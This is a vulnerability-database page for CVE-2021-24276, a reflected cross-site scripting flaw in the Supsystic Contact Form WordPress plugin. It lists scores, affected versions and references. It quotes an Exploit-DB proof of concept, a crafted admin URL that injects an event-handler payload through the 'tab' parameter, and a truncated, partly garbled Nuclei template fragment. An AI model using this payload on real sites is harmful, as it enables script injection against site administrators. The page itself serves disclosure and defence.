CVE-2021-24276
published 2021-05-05CVE-2021-24276: The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute…
PriorityP345medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
16.04%
96.5th percentile
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| supsystic | contact_form | < 1.7.15 | 1.7.15 |
| supsystic | contact_form_by_supsystic | >= 1.7.15 < 1.7.15 | 1.7.15 |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
exploitdb·2021-09-28·CVSS 6.1
CVE-2021-24276 [MEDIUM] WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
---
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276
1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Nuclei
WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2021-24276 [MEDIUM] WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting
WordPress Supsystic Contact Form alert(document.domain)'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100fbbe63cf7104dd88ac10f21af0872f3964541388d34c3b8c83d147798076b61d022100e5a3dffc5b0f905ebe91a238a065216ac64bf3f0fd1914647c1458f6ccec3590:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9chttp://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
2021-05-05
Published